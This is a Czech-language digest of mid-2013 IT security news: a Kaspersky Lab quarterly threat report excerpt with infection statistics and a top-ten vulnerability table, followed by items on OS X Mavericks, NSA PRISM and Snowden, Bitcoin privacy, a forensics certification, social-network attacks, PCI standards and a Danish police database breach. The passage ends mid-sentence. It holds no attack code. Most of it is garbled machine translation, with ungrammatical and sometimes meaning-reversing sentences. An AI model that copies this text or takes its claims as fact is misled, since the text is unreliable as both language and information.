Adware rodina AdWare.Win32.Bromngr debutoval v Top 20 na 8. místě ve 4. čtvrtletí 2012. V tomto čtvrtletí tvrdil, dva žebříčku (14. a 18.). Všechny změny tohoto adware modulu jsou DLL adresářů, které jsou v podstatě add-ons do běžně používaných prohlížečů (Internet Explorer, Mozilla Firefox a Google Chrome). Stejně jako drtivá většina z těchto typů programů, tento modul změny, které uživatel v nastavení vyhledávání, domovskou stránku, a pravidelně zobrazuje různé reklamy v pop-up oken.
Země, kde uživatelé spustit nejvyšší riziko lokální infekce Níže uvedené údaje ukazují průměrnou míru infekce u uživatelů počítačů v různých zemích. KSN Účastníci, kteří poskytují společnosti Kaspersky Lab informace se alespoň jeden nebezpečný soubor detekován na každé třetí (31,4%), počítače, a to buď na svém pevném disku nebo vyměnitelného disku připojeného k počítači. To je o 0,8 procentního bodu nižší než v předchozím čtvrtletí.
Úrovně počítačové infekce podle zemí * - TOP 20 hodnocení ** za 1. čtvrtletí 2013
* Podíl unikátních uživatelů v zemi s počítači se systémem produkty společnosti Kaspersky Lab, které blokovaly internetových hrozeb. ** Při výpočtu jsme vyřadili zemích, kde existují méně než 10.000 Kaspersky Lab uživatelé.
Pro čtvrté čtvrtletí v řadě, se Top 20 pozice v této kategorii drží zemí v Africe, na Středním východě a jihovýchodní Asii. Procento počítačů s zablokovaného škodlivého kódu je nejvyšší v Bangladéši, který viděl další pokles, tentokrát o 11,8 procentních bodů, takže to celkem na 67,8% (pokles z 90,9% ve 3. čtvrtletí 2012).
Místní nakažených může být také uveden do čtyř skupin podle úrovně rizika:
Maximální míra infekce lokální (přes 60%): na konci 1. čtvrtletí roku 2013, tato skupina součástí jen dvě země: Bangladéš (67,8%) a Vietnamu (60,2%). Vysoká lokální výskyt infekce (41-60%): 41 zemí, včetně Iráku (50,9%), Sýrie (45,5%), Myanmar (44,5%), Angola (42,3%) a Arménie (41,4%). Mírné lokální výskyt infekce (21 - 40%): 60 zemí, včetně Číny (37,6%), Katar (34,6%), Ruska (34,3%), Ukrajiny (33,6%), Libanonu (32,4%), v Chorvatsku (26,1%) , ve Španělsku (26%), Itálie (23,8%), Francie (23,4%) a na Kypru (23,3%). Nejnižší lokální výskyt infekce (až 21%): 31 zemí, včetně Belgii (19,3%), USA (19%), Spojeném království (18,6%), Austrálie (17,5%), do Německa (17,7%), Estonsku (o 17,8 %), Nizozemsko (16,2%), ve Švédsku (14,6%), v Dánsku (12,1%) a Japonsko (9,1%).
Riziko lokální infekce v různých zemích, Q1 2013
Top 10 nejbezpečnějších míst, pokud jde o místní infekce sazby jsou:
Japonsko 9,10% Dánsko 12,10% Finsko 13,60% Švédsko 14,60% Česká republika 14,80% Švýcarsko 15,10% Irsko 15,20% Nizozemsko 16,20% Nový Zéland 16,60% Norsko 16,80%
Dvě země, Nizozemsko a Norsko, jsou na seznamu sledovaného období, vytlačuje Lucembursko a Puerto Rico.
Chyby V prvním čtvrtletí letošního roku celkem 30 901 713 byly zranitelné programy a soubory zjištěna na uživatelských počítačích se systémem KSN. V průměru osm různých chyby zjištěn jednotlivých ohrožených počítači.
Top 10 nejčastější chyby jsou uvedeny v následující tabulce.
№ Secunia ID - Unikátní zranitelnost číslo Zranitelnost jméno a odkaz na popis Co zranitelnost umožňuje uživatelům se zlými úmysly dělat Procento uživatelů, na jejichž počítačích chyba byla detekována * Datum vydání Hrozba hodnocení 1 SA 50949 Oracle Java Několik chyb DoS útoky, získat přístup k systému, sdělování důvěrných informací a manipulaci s daty 45,26% 17.10.2012 Velmi kritický 2 SA 51771 Adobe Flash Player / AIR Integer přetečením Získat přístup k systému 22,77% 08.01.2013 Velmi kritický 3 SA 51090 es Adobe Shockwave Player Multiple Vulnerabiliti Získat přístup k systému 18,19% 24.10.2012 Velmi kritický 4 SA 51280 Oracle Java dvě chyby zabezpečení spuštění kódu Získat přístup k systému 17,15% 10.01.2013 Velmi kritický 5 SA 47133 Adobe Reader / Acrobat Více Chyby Získat přístup k systému 16,32% 07.12.2011 Velmi kritický 6 SA 51692 VLC Media Player HTML titulků syntaktické chyby zabezpečení přetečení vyrovnávací paměti Získat přístup k systému 14,58% 28.12.2012 Velmi kritický 7 SA 51226 Apple QuickTime Několik chyb Získat přístup k systému 14,16% 08.11.2012 Velmi kritický 8 SA 43853 Google Picasa Nejisté načítání knihovny Chyba zabezpečení Získat přístup k systému 12,85% 25.03.2011 Velmi kritický 9. SA 46624 Winamp AVI / IT zpracování souborů Slabá Získat přístup k systému 11,30% 03.08.2012 Velmi kritický 10 SA 41917 Adobe Flash Player Více chyb Získejte přístup k systému, mlčenlivost o důvěrných informacích a obejít bezpečnostní systém 11,21% 28.10.2010 Velmi kritický
* Procento ze všech uživatelů, na jejichž počítačích alespoň jeden zranitelnost byla zjištěna.
Nejrozšířenější chyby se vyskytují v Javě a byly zjištěny na 45,26% všech počítačů. Také v hodnocení je poměrně starý, ale velmi nebezpečná chyba v Adobe Flash Player. Tato chyba byla zjištěna již v říjnu 2010, ale společnosti Kaspersky Lab je stále odhalovat to na 11,21% zranitelných počítačů.
Top 5 chyby se vyskytují v Oracle a produkty Adobe, a jak jsme zmínili výše, Adobe je v horní části grafu. Šestého až devátého místa byla pořízena chyb nalezených v softwarových produktů od různých firem.
Vývojáři produktů s Top 10 chyb, Q1 2013
Použití jakéhokoliv zranitelnosti na Top 10 v konečném důsledku vede k realizaci náhodného kódu v systému.
Rozložení Top 10 zranitelností podle typu systému, vlivu v 1. čtvrtletí 2013
Tyto chyby jsou vždy nejlepší volbou mezi uživateli se zlými úmysly a zneužití, které je cílovým jsou cennější než jiné na černém trhu.
OS X Mavericks mít 200 + nové funkce
10. června 2013. OS
Apple dnes vydala vývojáře náhled OS X Mavericks, 10. hlavní verze nejvyspělejší operační systém.
S více než 200 novými funkcemi, OS X Mavericks přináší Mapy a iBook na Mac, představuje Finder tagy a posuzování, zvyšuje Podpora více displejů pro náročné uživatele, přináší nové klíčové technologie pro efektivitu průlomový výkon a výkonnost a zahrnuje všechny nové verzi Safari. Náhled verze OS X Mavericks je k dispozici pro Mac program developer členů začíná dnes. Mac uživatelé budou moci stáhnout Mavericks z obchodu Mac App Store letos na podzim. Mapy přináší pokročilé mapové technologie z iOS na Mac, včetně ostré vektorové grafiky, ohromující 3D zobrazení a interaktivní nadjezd. V aplikaci Mapy si můžete naplánovat cestu z vašeho počítače Mac, pak poslat na váš iPhone pro hlasovou navigaci na cestách. Mapy integrace celé Mavericks poskytuje uživatelům užitečné mapy zevnitř Mail, můžete kontakty a kalendář, a vývojáři integrovat stejné výkonné mapování funkce do svých aplikací pomocí Mapa Kit API. S iBooks máte okamžitý přístup k vaší stávající iBooks knihovně, stejně jako více než 1,8 milionu titulů v obchodě iBooks, z učebnic a klasiky na nejnovějších bestsellerů. iBooks také funguje bez problémů přes vaše zařízení, takže si můžete přečíst knihy na vašem počítači Mac, dělat si poznámky nebo zvýraznění, a pak zvednout přesně tam, kde jste skončili na iPad. OS X Mavericks přináší nové funkce pro zkušené uživatele a dokonalý zážitek Mac. Značky jsou nové výkonné způsob, jak uspořádat a najít soubory kdekoliv na vašem počítači Mac nebo iCloud. Můžete snadno označit libovolný soubor ve Finderu v iCloud, nebo při ukládání nového dokumentu. Tagy se zobrazí v postranním panelu Finderu, které vám umožní zobrazit soubory podle projektu nebo kategorie. Vyhledávač Záložky snížit nepořádek na ploše konsolidací více Finder okna do jednoho okna s několika záložkami. Můžete si přizpůsobit zobrazení pro každé kartě přesouvat soubory mezi kartami, a dokonce i spustit Finder s více otevřených záložek na celé obrazovce. Mavericks také umožňuje použití více displejů ještě jednodušší a silnější. Lišta menu a dock jsou k dispozici na žádném displeji, a uživatelé mohou nyní snadno spouštět okně, nebo v celoobrazovkové aplikace na kterékoliv zobrazení oni si vyberou, bez nutnosti konfigurace. S Mavericks můžete také použít vaše HDTV jako druhý displej pomocí Apple TV a rádiích. Nové klíčové technologie v OS X Mavericks zlepšit energetickou účinnost a odezvu vašeho počítače Mac. Časovač Koalescenční inteligentně sdružuje nízkoúrovňové operace tak, že CPU může trávit více času s nízkou spotřebou elektrické energie, úspory energie bez vlivu na výkon nebo rychlost reakce. Nap App snižuje energie spotřebované aplikací, které jste nepoužívají. Stlačený Memory technologie udržuje váš Mac rychlý a citlivý. Když váš systém paměť začíná naplnit, Stlačený paměti automaticky komprimuje neaktivní data. Jsou-li tyto položky znovu zapotřebí, Mavericks okamžitě dekomprimuje je. Nová verze Safari přináší Úžasný výkon, inovativní funkce a průlomových technologií. Safari překonává ostatní prohlížeče v oblasti energetické účinnosti, efektivity paměti a JavaScript výkon. Safari nový proces-per-tab architektura umožňuje prohlížeč citlivější, stabilní a bezpečný. Safari také zavádí inovace jako sdílené odkazy, které umožňují snadné objevit, číst a sdílet zajímavý nový obsah z Twitteru a LinkedIn, vše na jednom místě. Mezi další funkce v OS X Mavericks patří:
iCloud Keychain, který bezpečně uloží vaše webové stránky přihlašovací údaje, čísla kreditních karet a hesla Wi-Fi, a tlačí je do všech vašich zařízení, takže si nemusíte pamatovat. Informace jsou vždy chráněny šifrováním AES-256, když je uložen na vašem počítači Mac, a když to tlačí na vašem zařízení Aktualizovaný kalendář, který přidává integraci s Mapami, průběžné rolování, takže můžete pomocí zipu týdnů nebo měsíců, a nový inspektor zjednodušit vytváření a editaci událostí interaktivní Oznámení, která vám umožní odpovědět na zprávu, odpovědět na volání FaceTime nebo dokonce odstranit e-mail, aniž byste opustili aplikaci, kterou používáte. Webové stránky lze nyní používat oznámení, aby vás aktuální informace o novinkách, skóre a další informace. Když jsi byl pryč Upozornění ujistěte, že vidíte, co se stalo, zatímco váš Mac spal, a Xcode 5, se silnými, intuitivní nové nástroje pro vývojáře, které měří každý aspekt app výkonu a využívání energie, jakož as aplikací Testování.
NSA informátor zjevuje, svět reaguje
10. června 2013. Špionáž
To minulý týden byl nejvíce rušný v INFOSEC historii, protože jsem si vzpomenout. (v té době nepojmenovaný) informátor který otřásl světem tím, že zveřejní dokumenty, které zdánlivě dokázat, že Verizon (a případně i další poskytovatelé telekomunikačních služeb), je nucen sdílet metadata všechny telefonní hovory svým uživatelům, aby se NSA, a pak po něm ještě větší zjevení: NSA má přímý přístup k serverům - a údaje obsažené v nich - z mnoha společností, velkých internetových USA, včetně společností Microsoft, Facebook, Google, Yahoo, Apple, AOL, YouTube, Skype a Paltalk prostřednictvím programu nazval PRISM. Americká vláda reagovala popírání o přesnosti příběhů, vysvětlení, že to, co NSA dělá, je legální, oni nebyli špehování amerických občany, že shromážděné pouze metadata (The New Yorker vysvětluje, co může být sbíráno od něj), a prezident obhajoval dohled nad Američanů telefonu a internetu činnost jako nutné chránit americké firmy obviněné z účasti na programu PRISM vydal sérii podobně zní dementi (jak poukázal z bezpečnosti a ochrany osobních údajů výzkumník Chris Soghoian) a Twitter byl chválen pro ne dávat do vládních požadavků. ale přes víkend, bomby stále klesá: NSA vyvinula nástroj pro záznam a analýzu kde inteligence shromažďuje pochází, americký prezident Obama nařídil zpravodajských služeb, aby se seznam možných zámořských cílů pro americké kybernetické útoky, a pak, konečně, informátor zjevil veřejnosti. Ve hloubkové rozhovoru věnována opatrovníka novináři, 29-rok-starý Edward Snowden, bývalý CIA a Booz Allen Hamilton zaměstnanec, který pracoval na několika smluv o NSA, vysvětlil své důvody pro stát informátor. Stručně řečeno, že to udělal, protože chtěl "informování veřejnosti pokud jde o to, co se děje v jejich jménu, a to, co se děje proti nim, "a nemohl" s čistým svědomím dovolit vládu USA, aby zničil soukromí, svobody internetu a základních svobod lidí na celém světě s touto masivní dozoru stroje, které "znovu tajně budování." Uvedl, že si byl vědom, že bude démonizován a pravděpodobně stíhán vládou Spojených států, a že byl na to připraven. V současné době se nachází v Hong Kongu, kde cestoval do před všemi zjeveními, aby se zabránilo uzamčení tak dlouho, jak je to možné. Má naděje udělení azylu do země, která by ho vydat do USA, ale je si vědom, že věci nemusí skončit takhle. Nakonec řekl, že sám odhalen, protože vzhledem k situaci, neměl naději na zbývající anonymní dlouho, ale nechtěl, aby se stal příběh o něm. "Chci, aby to bylo o tom, co americká vláda dělá." Bohužel, od té chvíle, příběh se stal do značné míry o něm, ale Guardian Reportér Glenn Greewald říká, že bude "dávat fokus, kam patří velmi brzy : o chování americké vlády, "naznačuje možná na více nadcházejících výbušných odhalení. Debata o tom, zda Snowdenová by měly být považovány za zrádce nebo hrdina již začala ve Spojených státech a po celém světě. Bruce Schneier říká Snowdenová je "americký hrdina", a mnoho dalších souhlasí. Na druhé straně, tam jsou také ti, kteří by ho rádi viděli vydán a snažil se za to, co udělal. Ať Snowdenová nakonec bude nabitá nebo ne, někdo už začal petici , aby i pro Obamovu vládu vydat "plná, zdarma a absolutní odpuštění za všechny zločiny, které spáchal, nebo se případně dopustil souvisí s písknutím o programech tajných dozoru NSA. " Do té doby, lidé se také diskutovat o tom, zda jeho rozhodnutí jít do Hongkongu byl hloupý, nebo ne , nebo dokonce znamením jeho skutečné věrnosti, protože načasování jeho odhalení učinil dopad na první setkání amerického prezidenta Baracka Obamy a čínského prezidenta Xi Jinping.
Potenciální problémy ochrany soukromí Bitcoiny firmy přijímání
10. června 2013. Ochrany
Firmy přijímají Bitcoin platby chtít, aby zvážila o ochraně osobních důsledky, které taková možnost vytváří pro své zákazníky a pro sebe. Jak jste si mohou, ale ne teď, aby přijaté Bitcoiny, budete potřebovat adresu Bitcoin - jedinečný identifikátor se skládá z řetězce o 27 až 34 alfanumerických znaků. Zatímco toto ID je chtěl ukrýt Bitcoin uživatelů a transakcí, které provádějí, vzniká problém s tím, že každá transakce je ověřena a distribuován v reálném čase přes peer-to-peer sítě Bitcoin a veřejná kniha zaznamenání všech transakcí, je snadno přístupný a vyhledávat (např. zde ). Takže, pokud znáte adresu společnosti - a můžete snadno zjistit, že se tím, že platbu na ně - můžete sledovat všechny ostatní platby, které se v něm a (teoreticky) zjistit, co oni byli pro, a thusly, zjistit něco o svých financí, dodavatelského řetězce a další. Christian Dumontet, spoluzakladatel on-line objednávání služby restaurace Foodler, která začala přijímat Bitcoin platby před několika měsíci, vysvětluje na Wired , že tento druh vyšetřování by mohlo být obtížné, ale je možné získat uspokojivé výsledky -. navzdory skutečnosti, že většina obchodníků, které přijímají platby Bitcoin používat novou adresu vklad za každý prodej věc je, že obvykle spojit tyto vklady společně aby své vlastní platby, a je-li plátcem sleduje své vlastní transakci, může také analyzovat zbytek transakcí, které dostal spojeného s jeho a sbírat od nich něco. Podle Dumontet, Foodler vytvořil kus softwaru, který se snaží zakrýt ( alespoň částečně) společnosti "Bitcoin stezka" rozdělením denní vyrovnání do random množství a délky řetězu a smícháním se opakovaně. Platební služby s Bitcoin není zdaleka hlavním proudem, a společnosti, které přijímají tyto platby jsou stále vzácné , takže tento typ "útok" na firmy soukromí a soukromí svých uživatelů stále není, že bezprostřední hrozbu. Nicméně, je to jen otázkou času, kdy dolování dat nástrojů, které vám puška prostřednictvím tohoto veřejně dostupných informací jsou vytvořeny, Murray Jennex, docent v oblasti informačních systémů na San Diego State University, poukázal na PC World. Pokud jsou údaje se ukázalo být cenné pro marketingové účely nebo jiné ziskový podnik, můžete si být jisti, že mnozí se budou angažovat při těžbě to. A společnosti přijímající Bitcoin platby budou nuceni vymyslet a prosadit nové způsoby, jak maskovat transakce i pro jejich dobro a že z jeho zákazníků.
Nové odborné úrovni Cyber forenzní certifikace
10. června 2013. IT
(ISC) 2 vyvinula novou certifikaci, certifikované Cyber Forenzní Professional (CCFPSM), jako první celosvětový standard pro hodnocení zkušených profesionálů digitálních forenzní mistrovství "a profesionalitu. pověření, zpočátku k dispozici v USA a Jižní Korea začíná 25. září 2013, je určen pro digitální forenzní zaměstnavatelů a právníky s validací, že digitální forenzní profesionální digitální může vést vyšetřování, které přinášejí kompletní, přesné a spolehlivé výsledky. CCFP zahrnuje digitální forenzní disciplíny a informační bezpečnosti. Odráží mezinárodně uznávané normy, praxe forenzní technik a postupů, jakož i právní a etické zásady nezbytné digitálních forenzních odborníků. CCFP poskytne zaměstnavatelům objektivní měřítko toho druhu široce založený, ale hluboké znalosti požadované z dnešních zkušených profesionálů počítačové forenzní. Stejně jako u všech svých pověřovacích listin, (ISC) 2 provedla pracovní analýzy úkolů (JTA) Studijní a zkušební vývoj workshopy určit rozsah a obsah pověření CCFP programu. Předmět odborníci z (ISC) 2 členství a organizací z Afriky, Austrálie, Kanada, Hongkong, Indie, Nizozemí, Singapuru, Jižní Africe, Jižní Koreji, Velké Británii a Spojených státech přispěly k rozvoji společného souboru znalostí (CBK), která slouží jako základ pro pověření, jakož i zkoušku otázky. CCFP nabízí několik výhod pro zkušené počítačové forenzní odborníci a organizace, které je zaměstnávají. Pro profesionály, CCFP certifikace pomáhá jim:
Ověření a posílit jejich postavení jako pokročilé profesionály počítačové forenzní s komplexní, důvěryhodné certifikace Vštípit zaměstnavatele důvěru ve své schopnosti a rozšířit pracovní příležitosti s pověření, které potvrzuje jejich stávající znalosti, stejně jako jejich schopnost růst a vyvíjet se forenzní průmyslu Proveďte mezinárodní forenzní vyšetřování, vědí, že jejich CCFP protějšky v jiných zemích budou používat společný celosvětově uznávaný soubor znalostí Provádět průběžné vzdělávání zahrnující nejnovější pokroky v digitální forenzní vědy prostřednictvím (ISC) 2 periodického procesu obnovení osvědčení. "Digitální forenzní odborníci jsou stále více a více důležité pro stav zabezpečení každé organizace," říká W. Hord Tipton, CISSP-ISSEP, CAP, CISA, výkonný ředitel (ISC) 2. "CCFP je komplexní, odborné úrovni program, který vyplňuje významnou mezeru v digitální forenzní certifikačního trhu tím, že ověří hloubku senior-úrovni profesionálů" zkušenosti a odborné znalosti. Zajišťuje pověření majitelé mají potřebné šíři a hloubku znalostí a myšlení dovednosti potřebné k řešení dnešní složité počítačové forenzní problémy. " Pro dosažení CCFP, musí být žadatelé držiteli čtyřletý stupeň vedoucí k maturitě, nebo na regionální úrovni rovnocenné a mají alespoň tři roky na plný úvazek, odborné praxe v digitální forenzní nebo bezpečnosti IT ve třech ze šesti oblastí pověření. Ti, kteří drží titul musí mít šest let celodenní Time Digitální forenzní nebo zabezpečení IT pracovní zkušenosti ve třech ze šesti oblastí pověření nebo náhradník forenzní certifikace schválených (ISC) ² a pět let řádné-Time Digitální forenzní a IT bezpečnosti zkušenosti ve třech ze šesti oblastí pověření.
Tři důvody, proč rostou útoky na sociální sítě
A k tomu pět způsobů, jak se těmto útokům účinně bránit.
Sociální sítě
Popularita a vliv sociálních médií rostou světelnou rychlostí. Nedávné události přitom ukázaly, že s tímto fenoménem je spojeno nejen mnoho dobrého, ale také mnoho zlého. Významnou roli sehrály sociální sítě třeba při bombovém útoku během bostonského maratonu, kdy sloužily jako informační kanál, který pomohl k rychlému uklidnění situace.
Na druhou stranu si prostor sociálních médií oblíbili také různí zločinci působící v kybernetickém prostoru. Okamžitě po bostonském masakru tak začaly vznikat falešné profily charitativních organizací, které se snažily z lidí vylákat peníze pod záminkou pomoci obětem masakru.
Nedávné nabourání účtu organizace Associated Press zase ukázalo, jak moc sociální média ovlivňují současný svět. Po zveřejnění informace, že americký prezident Barack Obama byl zraněn při bombovém útoky v Bílém domě, klesly ceny na akciovém trhu.
Sociální sítě zkrátka změnily způsob, jakým spolu lidé komunikují a obchodují. Tato změna s sebou přináší rizika, kterým je třeba se bránit. Abychom však mohli přijmout účinná opatření, je nutné nejprve pochopit, proč útočníky vůbec sociální média tak lákají. Zde jsou tři hlavní důvody.
1. Protože existují Proč lupiče přitahují banky? Protože tam jsou peníze. Proč útočníky přitahují sociální sítě? Protože tam jsou lidé, popřípadě jejich data. Tyto sítě mají milióny uživatelů, kteří s ostatními sdílejí své informace. Pro útočníky jde o obrovský zdroj dat s velkým potenciálem.
2. Kdo nesdílí, jako by nebyl Lidé rádi sdílejí a často je jim jedno, s kým sdílejí. Čím více informací přitom zveřejní, tím více mají útočníci dat potřebných pro zneužití jiných účtů, prolomení hesel nebo odcizení identity. Jednou z nejběžnějších metod je cílený phishing, při kterém se útočníky snaží získat na svou potenciální oběť získat co nejvíce informací a přizpůsobit jim svůj útok.
3. Snadné šíření malwaru Sociální média slouží jako primární kanál pro šíření škodlivého softwaru. Podle zprávy Symantec Internet Security Threat je 43 % útoků realizovaných prostřednictvím sociálních sítí nějakým způsobem spojeno s malwarem.
Bezpečnost a ochrana na sociálních sítích jsou v první řadě otázkou chování samotných uživatelů. Použité technologie hrají až druhou roli. Některé z níže uvedených tipů zřejmě nebudete číst poprvé, přesto je nutné se k nim opětovně vracet, protože je mnozí stále nevzali na vědomí.
1. Vytvořte si silné heslo a pro každý účet používejte jiné Používáním stejných hesel na více účtech roste zranitelnost těchto účtů. Když padne jeden účet, padnou všechny.
2. Dvakrát si rozmyslete sdílení informací Měli byste sdílet pouze takové informace, o které byste se podělili i s naprosto neznámým člověkem.
3. Organizace by měla mít pravidla pro zaměstnance Pravidla pro chování pracovníků na sociálních sítích by měla jasně stanovit, jaký typ informací je možné sdílet a kdo je může sdílet.
4. Zabezpečte svůj počítač Ujistěte se, že každé vaše zařízení s připojením k internetu používá aktualizované bezpečnostní nástroje a poslední verze aplikací a operačních systémů.
5. Dávejte pozor na to, co stahujete Některé sociální sítě umožňují přidání nebo instalaci aplikací třetích stran, například her. Jejich přijetím jim můžete dát plný přístup k vašemu účtu a sdíleným informacím. Toho samozřejmě zneužívají útočníci, kteří vytvářejí vlastní podvodné aplikace.
Návrh zákona bude popírat zahraniční hackeři vstupu do USA
07. června 2013. Zákony
Den před plánovanou schůzkou prezidenta USA s čínským prezidentem Xi Jinping, nový zákon, který chce potrestat zločince, kteří nějakým způsobem kybernetické špionáže a krádeží jménem cizích vlád byl předložen americkým zákonodárcům.
Cyber ekonomické špionáži Accountability Act sponzorována ani reprezentantů Mike Rogers Tim Ryan a senátor Ron Johnson, "dá prezidentovi a Kongresu sílu a dohled zabývat se zahraniční kybernetické špionáže smysluplně," tvrdí kongresman Ryan. "Je čas se jsou důsledky těchto bezostyšné aktů přijatých zahraničních herců. Tento zákon je jednoduchý, zdravý rozum opatření. Řídí správu, aby vytvořila seznam špionů kybernetických aby to seznam zveřejní, a prosazovat sankce pro ty špatní herci, "uvedl senátor Johnson. Návrh zákona je určen na podporu a ministerstvem spravedlnosti stíhat ekonomické špionáži trestní řízení proti trestné činnosti zahraniční herce, popírání známé nebo podezřelé zahraniční hackeři víz pro vstup do USA, stejně jako zmrazení finančních aktiv a zrušení víz pro tyto hackery, že v současné době pobývat v USA, "Krást duševního vlastnictví ohrožuje nejen výrobní práci máme-to ohrožuje pracovní místa se snažíme vytvořit. Musíme zajistit, aby země jako Čína a Rusko již získat konkurenční výhodu prostřednictvím počítačové kriminality, "říká Ryan.
Změny normy pro bezpečnost PIN Transaction
07. června 2013. Zabezpečení
Dnes PCI Security Standards Council (PCI SSC) publikoval verzi 4.0 PIN Transaction Security (PTS) Point of Interaction (BZ) požadavky. Tyto požadavky, spolu s Hardware Security Module (HSM) požadavky poskytují standardy pro výrobce zařízení, aby obchodníci a jiní mají bezpečné zařízení pro příjem a zpracování platebních karet. okamžiku interakce (POI) zařízení, jako je zařízení, zadání čísla PIN, i nadále Primární metoda pro přijímání a zpracování kreditních karet a platebních terčem kriminálního útoku. Jako součást probíhajícího procesu tvorby norem, PCI Rada zveřejňuje aktualizace na základě potřeb odvětví a měnící se hrozby, s cílem zajistit nejsilnější technické normy pro platby:. Změny zavedené ve verzi 4.0 na PTS POI požadavky zaměřením na zvýšení odolnosti zařízení prostřednictvím lepších zkušebních postupů a zefektivnění procesů hodnocení a podávání zpráv pro obě zařízení prodejců a testovacích laboratoří. PTS POI požadavky jsou aktualizovány na tříletém cyklu, na základě zpětné vazby od komunity PCI. Vývojový proces také umožňuje menší aktualizace uvolňuje podle potřeby - v říjnu 2011, např. Rada vydala verzi 3.1 podporovat zavádění point-to-Point Encryption (P2PE) a mobilních technologií. Nová verze staví na těchto změnách zdůraznit použitelnost požadavků "k tradičním POI nasazení - včetně Point-of-Sale bezobslužné zařízení, stánky, mobilní dongles - a mnoho dalších druhů zařízení. Mezi hlavní změny patří: restrukturalizovaných otevřených protokolů modul - pomáhá zajistit POI zařízení nemají komunikační chyby, které lze vzdáleně zneužít k získání přístupu k citlivým údajům, nebo zdrojů v rámci zařízení. dokonalejší testování a logické bezpečnostní požadavky - požadavkem na přísnější dokumentace a posouzení všech rozhraních zařízení, pomůže zajistit, že žádné rozhraní může být zneužita nebo použita jako útoku. přidání recenze zdrojového kódu - další povinné hodnocení zdrojového kódu zvýšení robustnosti procesu testování. Zavedení dodavatele poskytované bezpečnostní politiku - poskytuje návod, který umožní realizaci schváleného POI zařízení v způsobem, který je v souladu s požadavky na POI, včetně informací o klíčových odpovědnost za řízení, správní odpovědnosti, funkce zařízení, identifikace a ekologických požadavků. Prodejci mají nyní možnost testování před verze 3.1 nebo verze 4.0. Od května 2014 verze 3.0 již nebude k dispozici pro nové hodnocení, může však být použit pro delta hodnocení.
Pirate Bay zakladatel podezření z hackerských policejních databází
07. června 2013. Hacking
Pirate Bay spoluzakladatel Gottfrid Svartholm, který byl vydán z Kambodže do Švédska zodpovídat za údajně hacking švédské IT společnosti Logica a Nordea bank mainframe byl jmenován jako podezřelý v jiném případě vniknutí. Spolu s nejmenovaný 20-letý Dánský občan, je Svartholm myslel to, že porušil a stáhnout velké množství souborů z mainframe systémů, společnost CSC za úkol udržet a manipulaci citlivé informace patří do dánské policie, jakož i dánského daňového úřadu a modernizace agentury. Podle k tiskové zprávě (přes Google Translate) vydané policií ve čtvrtek, má osobní identifikační čísla, records řidičů, a další byl napaden, ale není tam žádný důkaz, že útočníci použili ukradené informace libovolným způsobem. Hackeři mají údajně také přístup do Schengenského informačního systému - používá pohraniční stráže, policie, celní orgány, víza a soudní orgány v celém schengenském prostoru -., a informace o hledaných osobách v něm obsažených Útoky byly provedeny v období mezi dubnem a srpnem 2012, a podle Zaregistrovat se dánská policie objevili poté, co byl upozorňován švédské policie, který našel v Dánsku IP adresy těch, zjištěných v útoku Logica.
NSA má přímý přístup na Google, Facebook, Apple servery
07. června 2013. Špionáž
Po včerejším zprávou, že Verizon je nucen sdílet všechny telefonní hovor metadat NSA na denní bázi, je zápalná odhalení, že špionážní agentura má přímý přístup k serverům - a údaje obsažené v nich - z mnoha společností, velkých internetových USA , včetně společností Microsoft, Facebook, Google, Yahoo, Apple, AOL, YouTube, Skype a Paltalk.
The Guardian a The Washington Post se tak podařilo dostat své ruce na přísně tajnou prezentaci aplikace PowerPoint, který se používá k informování zpravodajských agentů o schopnostech tzv. PRISM programu. To zřejmě umožňuje přístup k e-mailu a chatu obsahu, videa, fotky, uložených dat, přenášených souborů, oznámení, online sociální sítě a další detaily. Podle prezentace dotyčné společnosti vědomě účastní programu, ale několik z nich (Google, Apple, Microsoft) již popřel a vědět něco o tom. Podle The Guardian, byl program zaveden v roce 2007 a nejnovější přírůstek do toho je Apple, který se připojil v roce 2012. Další společnosti se připojit údajně Dropbox. Američtí zákonodárci a politici reagovali na zprávy odlišně. Zatímco bývalý americký viceprezident Al Gore nazval pravomoci plošného dohledu v případě Verizon "nechutně odporné," senátní Výbor pro zpravodajskou činnost předsedkyně Dianne Feinstein a další členové výboru řekl , že všichni - každý člen senátu -. byla vědoma dozoru děje roky Senátor Saxby Chambliss (také členem výše uvedeného výboru) má nebyl vědom jediného občana podání stížnosti programu. Nyní se zdá jasné, že proto, že nevěděli o tom. Ostatní zákonodárci se smířlivější přístup s tím, že tento krok byl zřejmě proveden v souladu s Patriot Act, ale "více dohled" je potřeba. ředitel Národní zpravodajské služby James Clapper nabídl další podrobnosti o pořadí Verizon a dodal, že "programy dozoru, jako je tento, jsou stále předmětem ochranných opatření, které jsou navrženy tak, aby vhodné rovnováhy mezi zájmy národní bezpečnosti a občanských svobod a soukromí." On také poznamenal na dnešní zjevení říká, že informace shromážděné podle PRISM programu patří mezi nejdůležitější a cenné zahraniční zpravodajské informace, které shromažďují a používají se k ochraně USA z nejrůznějších hrozeb. "To nemůže být použit záměrně zaměřit každý občan USA, jiná osoba USA , nebo někdo nachází ve Spojených státech, "napsal s tím, že to bylo provedeno legálně, pak končit s odsouzením neoprávněnému zveřejnění informací o něm. soukromí obhajuje také vyjádřili svůj nesouhlas s akcí NSA. "NSA je součástí armády," komentoval ACLU Centra pro demokracii režiséra Jameel Jaffer. "Toto je bezprecedentní militarizace domácí komunikační infrastruktury. To je hluboce znepokojující pro každého, kdo se obávají, že oddělení."
Co dělají uživatelé po přihlášení?
07. června 2013. IT
Firmy dnes používá až 50 na prostory aplikací a 25 cloudových aplikací na průměru tak správa identit a přístupu (IAM) k zajištění zabezpečení dat a dodávat uživatel možnost může být kritické.
Nový výzkum z Symplified organizací ukazuje mnoho s IAM řešení v místě stále nevím, co lidé dělají, když je přihlášen do těch aplikací, mimo jiné bezpečnost a provozní problémy. Průzkum IT manažery a administrátory ukazuje 64 procent respondentů nemůže kontrolovat činnost uživatele po přihlášení, zda je přístup přes počítače, mobilní zařízení, nebo obojí; více než třetina (38 procent) uvádí, zažívá náhodnému přístup neoprávněný uživatel, a téměř čtvrtina (24 procent) se projevily hack odhalení pověření uživatele. Symplified také měřit, kteří organizace povoluje používat firemní aplikace, stejně jako jejich mobilní přístupové politiky, a zjistil:
